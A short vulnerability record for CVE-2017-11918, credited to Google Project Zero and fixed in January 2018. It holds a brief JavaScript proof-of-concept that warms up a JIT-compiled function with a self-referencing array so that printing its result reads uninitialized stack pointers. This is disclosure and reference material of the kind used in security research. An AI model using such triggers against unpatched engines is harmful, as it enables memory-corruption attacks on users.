CVE-2017-11918.md

CVE-2017-11918

• Fix: Jan 2018
• Credit: lokihardt of Google Project Zero

PoC

function opt() {
    let tmp = [];
    tmp[0] = tmp;
    return tmp[0];
}

function main() {
    for (let i = 0; i < 0x1000; i++) {
        opt();
    }

    print(opt());  // deref uninitialized stack pointers!
}

main();

Reference

• Microsoft
• Google Project Zero
• Fix